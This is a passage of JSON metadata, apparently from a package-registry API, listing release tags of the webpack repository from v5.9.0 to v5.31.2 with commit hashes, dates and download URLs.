ithub/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"}